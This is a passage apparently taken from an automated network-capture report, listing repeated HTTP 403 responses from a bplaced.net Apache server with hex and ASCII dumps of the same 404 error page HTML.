                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:39.063692093 CEST14447INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:39 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:40.064951897 CEST14455INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:40 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=116
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:41.292289019 CEST14463INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:41 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=125
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:42.350498915 CEST14471INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:42 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:43.187644005 CEST14479INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:43 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=88
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
